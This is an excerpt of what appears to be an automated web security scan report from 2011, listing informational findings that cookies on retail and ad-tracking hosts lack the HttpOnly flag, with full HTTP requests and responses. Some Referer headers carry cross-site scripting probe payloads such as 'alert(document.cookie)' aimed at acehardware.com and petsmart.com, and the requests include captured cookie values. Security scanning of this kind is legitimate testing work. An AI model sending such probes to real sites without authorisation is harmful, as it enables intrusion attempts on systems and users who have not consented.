Content-Type: text/html


13.89. http://core.bluefly.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.bluefly.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?tid=6&ci=90039438&vn2=e4.0&st=1305510900223&vn1=4.2.9-AdTarget&ec=utf-8&pi=homepage&cg=HOME&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.bluefly.com/&cvdone=p&cck= HTTP/1.1
Host: core.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; CoreID6=70191305510906213140849; TestSess3=70191305510906213140849; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:52 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90039438_login=1305511372001684429890039438; path=/
Set-Cookie: 90039438_reset=1305511372;path=/
Expires: Sun, 15 May 2011 08:02:52 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.90. http://customerappreciation.petco.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customerappreciation.petco.com
Path:   /cm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cm?tid=1&ci=90002311&vn2=e4.0&st=1305510842039&vn1=4.2.9-AdTarget&ec=utf-8&pi=HOME%20PAGE&ul=http%3A//www.petco.com/%3FAID%3D10413444%26PID%3D2537521%26cm_mmc%3DCJ-_-CID-_-2537521-_-10413444&lp=HOME%20PAGE HTTP/1.1
Host: customerappreciation.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; CoreID6=50181305510189266182813; TestSess3=50181305510189266182813; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; 90002311_login=1305510193015106202690002311; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; 90002311_reset=1305510204; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:24 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90002311_reset=1305511104;path=/
Expires: Sun, 15 May 2011 07:58:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.91. http://dis.us.criteo.com/dis/dis.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /dis/dis.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328 HTTP/1.1
Host: dis.us.criteo.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; uid=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; udi=*1ypiRHADgqOVLDzaJM2HozQ%3d%3d; uic=*13JJ4nVPBAZvX2oxLwxp72%2bPVcWJipruAaTcA3NuXJY2JZGgNsOGwxO9iV9ymXnS%2bRQrrGOhzs%2bgk8Hk%2fqXmKug%3d%3d; dis=*1O2O5m5J47iEnqZueLcqWtxcCi4uVmADkQsltgy969MzJl6hD0vJ9%2fYTs%2fXz4L%2ftUgL0Qy7BFIVMt8wwPwcmXYjb1pfZJNm7ONgbr495PvCrP%2bwYOZcbVabsTKpC7%2bUtdEXhHsUjV5QnjJbWD3rKEe73L0gNDHiML57wLUKPvzIf1XJTn89FQ4HhOAY1M9we5sdbBMugi6Uqt6nHW0Jt9ktDEwZzLQqkBa4IloWNE1MtaoHzfQzaFR4y0BUBsZ7DFYp2IZixF8et2lMNosgRxRWp79%2bM4TKMH6JAqdW%2bjpziQK7lZIHWWJDRuAZ6DwSBoamG%2fkBKk%2bKAtHbz1dwkmVEkQVb%2fIze05p%2fqSp4wiAPKRsFYXVNumVIafblcuOqcb

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Mon, 16 May 2011 02:01:30 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: uic=*1Tomxq8BrFqEZpOQ1bYZp%2fBO4dZgo%2b527C6zdnJIE1IWT1EPmKzBQb4n5pBlPC%2fT%2fB3YzVvHSJbrylzlwjU6Iy9ny1g89DtKdShGo4u19iVt5FU670PqdTOIyNxrGJItJ; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
Set-Cookie: udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
Set-Cookie: udi=*1yi90rI1ylE1uj7gpL89Aeg%3d%3d; domain=.criteo.com; expires=Tue, 17-May-2011 02:01:31 GMT; path=/
Set-Cookie: dis=*1jiNeCk4kGIZ9mu6mPVBINFP44jJN2GwOkV4%2f%2ft9P33QKlB82NkB5zNkzE%2bekrFzM8SSGQa6U2CckAyo3mINtneKAVrvoC%2fboyA5mZpGi41ULSg0gVtk0sRCj6W62P3adaTaqypakl79Ry4nKG5uVqUR9F4AYF9WxfRJbZkS2EIVE2W209%2bPDJPrRWr33FkzHwAotwKaHsjDezbx9FPSVVVyUxz16CXz0T%2fKisSwO7BSGDea496TpUYJfHwtWUIX4OiCA0EkiWo66M7dH4pxYg05Gfyn87OaKvkdXer5hgIUx5EOBCA%2bQCmaHCTx7rJwUqtwkEryIcS8GT782Xww7sDg6zIRkRFJrSTemCS6u%2fKqr%2fpxT0arnV3oClxANx0CyRh1ULL3qPB0ZaONp2JBfF3Do4BJgpUHQJ5DTaOCWFHHqlxMwZpRlU2rL9zOyEzLY; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
Content-Length: 4888

<html>
<head>
<title>Dising</title>
<script type="text/javascript">
function edcTimeout(){}
function write_edc(){}
function initEdc(){}
function cto_AI(u,n,r){if(document.createElement){if(r){v
...[SNIP]...

13.92. http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s35783476170925

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gsicace.112.2o7.net
Path:   /b/ss/gsicace/1/H.20.3/s35783476170925

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/gsicace/1/H.20.3/s35783476170925?AQB=1&ndh=1&t=16/4/2011%206%3A4%3A7%201%20300&vmt=2932E0&ns=gsicace&pageName=Category%3A%202568444%3A%20Lawn%20%26%20Garden&g=http%3A//www.acehardware.com/category/index.jsp%3FcategoryId%3D2568444%26clickid%3Dtopnav_lawn63471--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Ef5bbaf27fb7&r=http%3A//burp/show/15&ch=Lawn%20%26%20Garden&server=www.acehardware.com&c2=Category%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c7=Category%3A%202568444%3A%20Lawn%20%26%20Garden&v22=New&v24=7%3A00AM&v25=Monday&v26=Weekday&c32=Category%3A%20Lawn%20%26%20Garden&c34=Category%3A%202568444%3A%20Lawn%20%26%20Garden&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: gsicace.112.2o7.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/category/index.jsp?categoryId=2568444&clickid=topnav_lawn63471--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef5bbaf27fb7
Cookie: s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E4A3B485010447-40000104C02528FD|4DCBEC0F[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E4A3B485010447-40000104C02528FF|4DCBEC0F[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E4A3B485010447-40000104C0252901|4DCBEC0F[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E4A3B485010447-40000104C0252903|4DCBEC0F[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 11:04:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E8825485158956-6000016F80001DC7[CE]; Expires=Sat, 14 May 2016 11:04:09 GMT; Domain=gsicace.112.2o7.net; Path=/
Location: http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s35783476170925?AQB=1&pccr=true&vidn=26E8825485158956-6000016F80001DC7&&ndh=1&t=16/4/2011%206%3A4%3A7%201%20300&vmt=2932E0&ns=gsicace&pageName=Category%3A%202568444%3A%20Lawn%20%26%20Garden&g=http%3A//www.acehardware.com/category/index.jsp%3FcategoryId%3D2568444%26clickid%3Dtopnav_lawn63471--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Ef5bbaf27fb7&r=http%3A//burp/show/15&ch=Lawn%20%26%20Garden&server=www.acehardware.com&c2=Category%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c7=Category%3A%202568444%3A%20Lawn%20%26%20Garden&v22=New&v24=7%3A00AM&v25=Monday&v26=Weekday&c32=Category%3A%20Lawn%20%26%20Garden&c34=Category%3A%202568444%3A%20Lawn%20%26%20Garden&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 11:04:09 GMT
Last-Modified: Tue, 17 May 2011 11:04:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www324
Content-Length: 0
Content-Type: text/plain


13.93. http://hire.jobvite.com/CompanyJobs/Careers.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CompanyJobs/Careers.aspx?c=qlZ9Vfw8 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=am2qlgznv2utc045d0xr1hr3; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=5ca2bcbf-4c16-4cf2-b0d2-57e62d1c65f1; expires=Wed, 15-Jun-2011 10:22:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:19 GMT
Content-Length: 40128

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="http://hir
...[SNIP]...

13.94. http://html.aggregateknowledge.com/iframe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe?wid=2&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp&senduuid=0 HTTP/1.1
Host: html.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=801458892474636324; u=5|0AQBbQQcAAAAAAAEAAQEAgA%3D%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=801458892474636324; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Sat, 14-May-2016 01:58:28 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0AQBbQRYAAAAAAQEAAQEAgA%3D%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Wed, 15-May-2013 01:58:28 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 301
Date: Mon, 16 May 2011 01:58:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="pragma" content="no-cache">
</head>

<body style="border: 0; margin: 0
...[SNIP]...

13.95. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=cab0b2f4-a675-49e9-abc7-97bd867f44f5&cacheBust=1305510841 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271; domain=.interclick.com; expires=Sun, 16-May-2021 02:01:00 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 16 May 2011 02:01:00 GMT

GIF89a.............!.......,...........D..;

13.96. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5MjgmdGw9NDMyMDA=&piggybackCookie=uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PUBMDCID=2; KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; pubtime_27159=TMC; PMDTSHR=; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.22328.18842.49076.13450.; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; pubfreq_27159=165-1; KRTBCOOKIE_27=1216-110; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:55 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837; domain=pubmatic.com; expires=Thu, 15-May-2014 01:53:57 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

13.97. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://includes.petsmart.com
Path:   /homepage/redesigned/images/logo-facebook.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /homepage/redesigned/images/logo-facebook.gif HTTP/1.1
Host: includes.petsmart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=JOLQUPS172.16.96.228CKMYW; path=/
Date: Mon, 16 May 2011 10:49:56 GMT
Server: Apache
Last-Modified: Fri, 27 Mar 2009 22:11:50 GMT
ETag: "f28003-78-4662104f59580"
Accept-Ranges: bytes
Content-Length: 120
Content-Type: image/gif

GIF89a.......;Y....m.....ay.Eb.`x....!.......,..........=x.....I.$.j...A0u......\....."@R...o..>..XQ.... .,..I&.y..(...;

13.98. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://includes.petsmart.com
Path:   /homepage/redesigned/images/logo-twitter.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /homepage/redesigned/images/logo-twitter.gif HTTP/1.1
Host: includes.petsmart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=JOLQUPS172.16.96.228CKMYW; path=/
Date: Mon, 16 May 2011 10:49:56 GMT
Server: Apache
Last-Modified: Fri, 27 Mar 2009 22:02:41 GMT
ETag: "f28004-175-46620e43c8240"
Accept-Ranges: bytes
Content-Length: 373
Content-Type: image/gif

GIF89a.....$..........|........d..t.......................<.....l........$....................T........D..L...........\.................................................................................
...[SNIP]...

13.99. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=tosh_cs=1&betq=7046=395215 HTTP/1.1
Host: leadback.advertising.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: ACID=gz150013044372470058; F1=B0bSJ3EBAAAABAAAAMAAgEA; BASE=23QqCCTy8s/uR9O!; ROLL=dtg1eliDxJrcjKM!; aceRTB=rm%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Cam%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Cdc%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Can%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Crub%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7C; C2=gvmyNJpwIg02FAHCdbdBwhgohXAc; GUID=MTMwNTExMTUyMDsxOjE2c2txbW0wbDE1dnAxOjM2NQ

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 10:41:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://ad.yieldmanager.com/pixel?id=563479&t=2
Set-Cookie: C2=h9P0NJpwHg02FkwBdbdBJcgohXQCbaICPfgBwB; domain=advertising.com; expires=Wed, 15-May-2013 10:41:37 GMT; path=/
Set-Cookie: GUID=MTMwNTU0MjQ5NzsxOjE2c2txbW0wbDE1dnAxOjM2NQ; domain=advertising.com; expires=Wed, 15-May-2013 10:41:37 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 16 May 2011 11:41:37 GMT
Content-Length: 0


13.100. http://login.dotomi.com/ucm/UCMController

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2134&dtm_cmagic=fca078&dtm_format=5&cli_promo_id=2&dtm_user_id=&dtmc_cat=Lawn%20%26%20Garden&dtmc_catid=2568444&dtmc_subcat=&dtmc_subcatid=&dtmc_prodid=4252238&dtmc_prod_img=http%3A//ACE.imageg.net/graphics/product_images/pACE3-8013737th.jpg&dtmc_zip=&dtmc_ref=http%3A//burp/show/15 HTTP/1.1
Host: login.dotomi.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/category/index.jsp?categoryId=2568444&clickid=topnav_lawn63471--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef5bbaf27fb7

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:04:14 GMT
X-Name: dmc-o02
Set-Cookie: Apache=173.193.214.243.1305543854697238; path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Content-Type: text/html
Content-Length: 191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>

</body>
</html>

13.101. http://media.fastclick.net/w/tre

Summary

Severity:   Information
Confidence:   Certain
